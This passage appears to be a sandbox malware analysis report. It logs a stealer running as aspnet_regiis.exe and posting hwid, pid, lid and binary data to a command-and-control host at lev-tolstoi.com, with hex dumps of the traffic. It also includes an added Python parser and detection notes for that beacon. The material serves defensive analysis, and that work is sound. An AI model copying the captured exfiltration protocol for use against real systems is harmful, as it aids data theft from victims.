                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC369INData Raw: 71 53 50 53 33 6b 5a 4b 46 67 37 4c 4f 35 55 49 6c 37 38 33 37 35 61 68 63 74 44 78 78 63 67 6f 41 55 4e 33 44 6c 48 64 73 63 6f 51 48 76 66 37 4b 68 64 50 57 38 59 66 6c 65 58 72 76 6a 65 76 76 73 7a 7a 6b 5a 53 38 6e 41 31 38 45 75 73 50 65 4b 43 34 37 30 78 71 39 36 4d 72 45 6b 4a 79 77 7a 36 5a 72 61 4f 6a 72 68 5a 72 79 5a 4c 45 6c 62 6b 73 69 46 67 66 33 30 34 6c 68 4d 47 43 51 42 76 4f 33 6e 4d 50 64 7a 71 32 4a 2f 55 51 72 35 35 57 45 38 36 68 78 39 32 6f 2f 51 42 38 66 45 2f 33 44 6a 7a 31 62 62 35 34 4f 36 71 48 4b 7a 64 4f 49 34 70 48 31 4d 79 75 72 78 50 76 6c 75 44 76 73 5a 79 77 69 54 45 4d 43 74 4d 7a 65 5a 6a 77 74 77 55 61 39 6f 73 72 62 30 38 6d 68 32 37 64 37 61 4c 6e 57 2f 49 50 57 52 37 41 30 65 6e 49 4d 55 7a 50 78 77 5a 6b 77 4d 6a
                                                                                                                                                                                                                                            Data Ascii: qSPS3kZKFg7LO5UIl78375ahctDxxcgoAUN3DlHdscoQHvf7KhdPW8YfleXrvjevvszzkZS8nA18EusPeKC470xq96MrEkJywz6ZraOjrhZryZLElbksiFgf304lhMGCQBvO3nMPdzq2J/UQr55WE86hx92o/QB8fE/3Djz1bb54O6qHKzdOI4pH1MyurxPvluDvsZywiTEMCtMzeZjwtwUa9osrb08mh27d7aLnW/IPWR7A0enIMUzPxwZkwMj
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 32 35 66 32 0d 0a 77 7a 51 55 73 79 48 42 7a 35 32 39 78 42 61 6e 69 44 43 2f 69 33 74 4c 32 64 69 62 62 4f 71 33 74 72 37 35 76 37 73 71 67 78 6a 6e 49 33 4e 53 4e 66 58 65 4b 56 78 6a 42 4a 64 70 30 47 2b 71 61 62 7a 72 43 59 72 38 61 75 66 43 76 68 6c 62 33 39 73 44 6e 35 63 6e 74 6b 58 45 6c 4e 71 49 37 4c 49 79 73 6c 77 52 65 7a 71 63 71 56 30 39 62 77 68 2b 56 76 4b 2f 65 56 2f 4c 50 6c 61 4c 51 38 66 47 63 4f 46 78 37 73 31 74 6c 4f 51 6c 53 65 41 2f 47 39 68 59 69 74 73 49 50 45 72 6e 46 6d 6f 4e 36 46 67 2f 31 71 75 54 78 34 59 77 31 52 55 37 72 61 33 69 68 46 4e 64 74 49 77 76 37 4b 6d 39 50 57 34 76 79 6d 63 32 57 6f 77 36 72 77 79 57 53 38 50 6e 4a 36 46 31 46 54 75 74 50 65 4b 43 77 37 30 77 7a 73 38 4e 4c 54 77 64 58 33 6d 76 49 74 4f 62 43
                                                                                                                                                                                                                                            Data Ascii: 25f2wzQUsyHBz529xBaniDC/i3tL2dibbOq3tr75v7sqgxjnI3NSNfXeKVxjBJdp0G+qabzrCYr8aufCvhlb39sDn5cntkXElNqI7LIyslwRezqcqV09bwh+VvK/eV/LPlaLQ8fGcOFx7s1tlOQlSeA/G9hYitsIPErnFmoN6Fg/1quTx4Yw1RU7ra3ihFNdtIwv7Km9PW4vymc2Wow6rwyWS8PnJ6F1FTutPeKCw70wzs8NLTwdX3mvItObC
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 6b 2b 58 63 6a 45 31 45 31 46 46 77 35 58 57 4d 45 4d 37 30 78 43 39 36 4d 71 32 6b 49 43 73 7a 72 4e 73 4a 6f 72 43 75 4b 33 75 61 76 64 38 50 33 4e 63 53 55 32 30 6c 5a 70 68 50 43 33 44 57 71 62 6c 32 64 54 44 33 4c 32 48 76 44 31 39 37 34 33 70 38 36 68 37 39 32 6f 2f 4d 68 38 44 44 2f 7a 57 69 48 4d 37 53 36 30 75 2f 71 47 41 6f 70 36 65 70 66 65 62 61 47 69 68 32 37 79 72 2b 53 6e 35 63 6e 41 31 52 43 68 64 73 70 6d 59 63 32 6f 31 72 45 61 39 71 4d 72 62 30 37 75 68 78 36 74 36 66 62 36 59 6e 62 37 35 59 35 59 2f 62 33 4a 63 58 31 33 38 6c 63 59 6a 4d 6a 57 58 47 62 33 6f 32 74 48 49 32 2f 47 65 39 53 39 30 34 63 7a 37 71 36 67 78 35 58 77 2f 5a 31 78 4a 58 62 33 57 6a 47 4a 36 64 6f 55 4c 75 6f 36 30 74 70 43 41 72 4d 36 7a 53 47 69 2b 31 72 75 32
                                                                                                                                                                                                                                            Data Ascii: k+XcjE1E1FFw5XWMEM70xC96Mq2kICszrNsJorCuK3uavd8P3NcSU20lZphPC3DWqbl2dTD3L2HvD19743p86h792o/Mh8DD/zWiHM7S60u/qGAop6epfebaGih27yr+Sn5cnA1RChdspmYc2o1rEa9qMrb07uhx6t6fb6Ynb75Y5Y/b3JcX138lcYjMjWXGb3o2tHI2/Ge9S904cz7q6gx5Xw/Z1xJXb3WjGJ6doULuo60tpCArM6zSGi+1ru2


Session ID: 3
Source IP: 192.168.2.4
Source Port: 49733
Destination IP: 104.21.66.86
Destination Port: 443
PID: 4820
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:38:06 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=LEXMHB03TXM1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18134
Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-27 21:38:06 UTC15331OUTData Raw: 2d 2d 4c 45 58 4d 48 42 30 33 54 58 4d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 39 31 37 45 43 36 41 45 39 46 43 44 39 32 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 45 58 4d 48 42 30 33 54 58 4d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 45 58 4d 48 42 30 33 54 58 4d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 64 0d 0a 2d 2d 4c 45 58 4d 48 42 30
                                                                                                                                                                                                                                            Data Ascii: --LEXMHB03TXM1Content-Disposition: form-data; name="hwid"2917EC6AE9FCD922BEBA0C6A975F1733--LEXMHB03TXM1Content-Disposition: form-data; name="pid"2--LEXMHB03TXM1Content-Disposition: form-data; name="lid"HpOoIh--aadb880da83d--LEXMHB0
                                                                                                                                                                                                                                            2024-12-27 21:38:06 UTC2803OUTData Raw: 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88
                                                                                                                                                                                                                                            Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2024-12-27 21:38:07 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 21:38:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=0cjp8ef9r7lsdq0blec2lt9r9j; expires=Tue, 22 Apr 2025 15:24:45 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bDmc4z%2FuLs7QicyLJuNeICsDJYyFmg5Z7bwRsl%2BXy6ofgDvp5gnUHxGnPyegnxroZlknSLHLO8IyVCpLCNUHS9VAC0lhoKEUxwCGwYuuE%2BO6cM3G62pyqw07OtPllXgZ7I0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8c74a6d9fef02d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1791&rtt_var=690&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19089&delivery_rate=1565683&cwnd=77&unsent_bytes=0&cid=e0b64d67f41513d2&ts=1002&x=0"
2024-12-27 21:38:07 UTC | 20 | IN
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f\r\nok 8.46.123.189\r\n (one chunk of 0xf = 15 bytes carrying the text "ok 8.46.123.189")
2024-12-27 21:38:07 UTC | 5 | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n (zero-length chunk that terminates the chunked body)
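The two sessions above (3, and the repeat in 4) show the stealer's check-in shape end to end: a multipart POST to /api carrying the form fields hwid, pid and lid, answered with a chunked body reading "ok <ip>". The following Python is an added example for readers of this report, not code from Joe Sandbox or from the sample; it parses that request shape, decodes the chunked reply, and applies a heuristic match that is derived only from this capture. The request body is constructed from the three fields visible in the session 3 hex (the real request went on with a binary part that the report truncates), so the closing boundary is an assumption, as is the field set used for matching.

```python
"""Decode the /api beacon and reply recorded in session 3 above.

Added example, not code from Joe Sandbox or from the analysed sample. The request
body is constructed from the multipart fields visible in the capture; the closing
boundary is added here and does not appear in the (truncated) capture.
"""
import re
from typing import Dict, Optional

# Constructed sample: boundary, field names and values transcribed from session 3.
SAMPLE_REQUEST_BODY = (
    b'--LEXMHB03TXM1\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n'
    b"2917EC6AE9FCD922BEBA0C6A975F1733\r\n"
    b'--LEXMHB03TXM1\r\nContent-Disposition: form-data; name="pid"\r\n\r\n'
    b"2\r\n"
    b'--LEXMHB03TXM1\r\nContent-Disposition: form-data; name="lid"\r\n\r\n'
    b"HpOoIh--aadb880da83d\r\n"
    b"--LEXMHB03TXM1--\r\n"   # closing boundary: assumed, not present in the capture
)
SAMPLE_REQUEST_HEADERS = {
    "Host": "lev-tolstoi.com",
    "Content-Type": "multipart/form-data; boundary=LEXMHB03TXM1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
}
# Reply body exactly as captured: one 0xf-byte chunk, then the zero chunk.
SAMPLE_REPLY_BODY = bytes.fromhex(
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a 30 0d 0a 0d 0a"
)

# Field set seen in sessions 3 and 4; a heuristic from this capture, not a vendor signature.
BEACON_FIELDS = {"hwid", "pid", "lid"}


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Return {field name: raw value} for a multipart/form-data body."""
    delimiter = b"--" + boundary.encode("ascii")
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):             # "--boundary--" closes the body
            break
        if part.startswith(b"\r\n"):           # CRLF that follows the delimiter
            part = part[2:]
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue                           # malformed part: no header/body split
        match = re.search(rb'name="([^"]*)"', head)
        if match is None:
            continue
        if value.endswith(b"\r\n"):            # CRLF that precedes the next delimiter
            value = value[:-2]
        fields[match.group(1).decode("ascii", "replace")] = value
    return fields


def decode_chunked(data: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer-coded body; ValueError if truncated."""
    out = bytearray()
    pos = 0
    while True:
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("chunk-size line not terminated")
        size = int(data[pos:eol].split(b";", 1)[0].strip(), 16)   # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)                  # trailers, if any, are ignored
        chunk = data[pos:pos + size]
        if len(chunk) != size or data[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk")
        out += chunk
        pos += size + 2


def analyse_beacon(path: str, headers: Dict[str, str], body: bytes,
                   reply_body: bytes) -> Optional[Dict[str, str]]:
    """Match the request/reply shape of session 3; return decoded details or None."""
    ctype = headers.get("Content-Type", "")
    boundary = re.search(r"boundary=([^;\s]+)", ctype)
    if path != "/api" or not ctype.startswith("multipart/form-data") or boundary is None:
        return None
    fields = parse_multipart(body, boundary.group(1))
    if not BEACON_FIELDS.issubset(fields):
        return None
    reply = decode_chunked(reply_body).decode("ascii", "replace").strip()
    ip = re.fullmatch(r"ok (\d{1,3}(?:\.\d{1,3}){3})", reply)
    return {
        "host": headers.get("Host", ""),
        "hwid": fields["hwid"].decode("ascii", "replace"),
        "pid": fields["pid"].decode("ascii", "replace"),
        "lid": fields["lid"].decode("ascii", "replace"),
        "reply": reply,
        "reply_ip": ip.group(1) if ip else "",
    }


if __name__ == "__main__":
    print(analyse_beacon("/api", SAMPLE_REQUEST_HEADERS, SAMPLE_REQUEST_BODY, SAMPLE_REPLY_BODY))
```

Two points worth checking against the capture when using this on real traffic. First, the two OUT records of session 3 (15331 + 2803 bytes) add up exactly to the declared Content-Length of 18134, so the binary part after the lid field is part of the same request, not a second one; the parser above only sees the text fields of the constructed sample. Second, the field names alone are a weak indicator; the stronger signal on the host side is the process column of the session table, where the outbound HTTPS originates from C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, a signed .NET framework tool that has no business talking to a Cloudflare-fronted PHP site.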


Session ID: 4
Source IP: 192.168.2.4
Source Port: 49734
Destination IP: 104.21.66.86
Destination Port: 443
PID: 4820
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:38:08 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=6G77YAN4O6JQCPPA9F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8791
Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-27 21:38:08 UTC8791OUTData Raw: 2d 2d 36 47 37 37 59 41 4e 34 4f 36 4a 51 43 50 50 41 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 39 31 37 45 43 36 41 45 39 46 43 44 39 32 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 36 47 37 37 59 41 4e 34 4f 36 4a 51 43 50 50 41 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 47 37 37 59 41 4e 34 4f 36 4a 51 43 50 50 41 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38
                                                                                                                                                                                                                                            Data Ascii: --6G77YAN4O6JQCPPA9FContent-Disposition: form-data; name="hwid"2917EC6AE9FCD922BEBA0C6A975F1733--6G77YAN4O6JQCPPA9FContent-Disposition: form-data; name="pid"2--6G77YAN4O6JQCPPA9FContent-Disposition: form-data; name="lid"HpOoIh--aadb8
                                                                                                                                                                                                                                            2024-12-27 21:38:11 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 21:38:11 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=enhgt8rp2ncnp86jtt8jksi6si; expires=Tue, 22 Apr 2025 15:24:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pUEUhzJPRJVvQuoHqRySmDW9KOu2efVGMck%2FbjdTbFJzpxQdv7aTQ3txkBM%2F9sDM0IetocJmTy4hMuB5DvWyjFrDUPZso1TPh9geasaIqPTb%2B8OUdqDKDyVMnbB21A7rneI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8c74b5c8400f77-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=602&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9729&delivery_rate=1815920&cwnd=231&unsent_bytes=0&cid=d448efdcb7ea0a49&ts=2952&x=0"
                                                                                                                                                                                                                                            2024-12-27 21:38:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-27 21:38:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | 4820 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:38:13 UTC | 277 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=VTE315RFUWUZY5
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20420
    Host: lev-tolstoi.com
2024-12-27 21:38:13 UTC | 15331 | OUT | Data Raw: 2d 2d 56 54 45 33 31 35 52 46 55 57 55 5a 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 39 31 37 45 43 36 41 45 39 46 43 44 39 32 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 54 45 33 31 35 52 46 55 57 55 5a 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 54 45 33 31 35 52 46 55 57 55 5a 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 64 0d 0a 2d 2d 56
    Data Ascii: --VTE315RFUWUZY5Content-Disposition: form-data; name="hwid"2917EC6AE9FCD922BEBA0C6A975F1733--VTE315RFUWUZY5Content-Disposition: form-data; name="pid"3--VTE315RFUWUZY5Content-Disposition: form-data; name="lid"HpOoIh--aadb880da83d--V
2024-12-27 21:38:13 UTC | 5089 | OUT | Data Raw: 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Data Ascii: M?lrQMn 64F6(X&7~`aO
2024-12-27 21:38:14 UTC | 1125 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 21:38:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=uelf38aoocgj3hunnr7in966pr; expires=Tue, 22 Apr 2025 15:24:52 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GCRQLDhsqe3HhsQXW32pV0ULUscAiI5vIOapcNtOq2xcnoUrgB6J8ZkATyJtYy5rHrRpn%2FNlRHgtLGK0ZamOik5MpnPeWBk1sD5L%2FsLeFIDty5RUlTlb2R9TJDwUMc5w8fw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f8c74d10a4342bc-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2130&min_rtt=2096&rtt_var=810&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2834&recv_bytes=21377&delivery_rate=1393129&cwnd=225&unsent_bytes=0&cid=2d7df55d421ff584&ts=942&x=0"
2024-12-27 21:38:14 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-27 21:38:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49737 | 104.21.66.86 | 443 | 4820 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:38:15 UTC | 281 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=LYXP6LOCU8472NMT2QZ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1284
    Host: lev-tolstoi.com
2024-12-27 21:38:15 UTC | 1284 | OUT | Data Raw: 2d 2d 4c 59 58 50 36 4c 4f 43 55 38 34 37 32 4e 4d 54 32 51 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 39 31 37 45 43 36 41 45 39 46 43 44 39 32 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 59 58 50 36 4c 4f 43 55 38 34 37 32 4e 4d 54 32 51 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 59 58 50 36 4c 4f 43 55 38 34 37 32 4e 4d 54 32 51 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61
    Data Ascii: --LYXP6LOCU8472NMT2QZContent-Disposition: form-data; name="hwid"2917EC6AE9FCD922BEBA0C6A975F1733--LYXP6LOCU8472NMT2QZContent-Disposition: form-data; name="pid"1--LYXP6LOCU8472NMT2QZContent-Disposition: form-data; name="lid"HpOoIh--aa
2024-12-27 21:38:16 UTC | 1126 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 21:38:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=o8kfeabgq4o4iigegqm3lm232o; expires=Tue, 22 Apr 2025 15:24:55 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hgqJzoJKaRlFNL%2BnR%2Fq7xMaBrq0KTfG7dZuCChIcf9EcXzmsoMYxOOLIRetIMFaevExyzCapTrTfZIHxfKIPlRV%2B%2Fed7gcR0RfEGCtYtdGq5HDqCLrG7riczNNTqqLs44n4%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f8c74e17d4d435d-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1584&rtt_var=604&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2201&delivery_rate=1796923&cwnd=128&unsent_bytes=0&cid=52d3a1860076e5b9&ts=777&x=0"
2024-12-27 21:38:16 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-27 21:38:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 7
Source IP: 192.168.2.4
Source Port: 49739
Destination IP: 104.21.66.86
Destination Port: 443
PID: 4820
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:38:17 UTC | 276 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
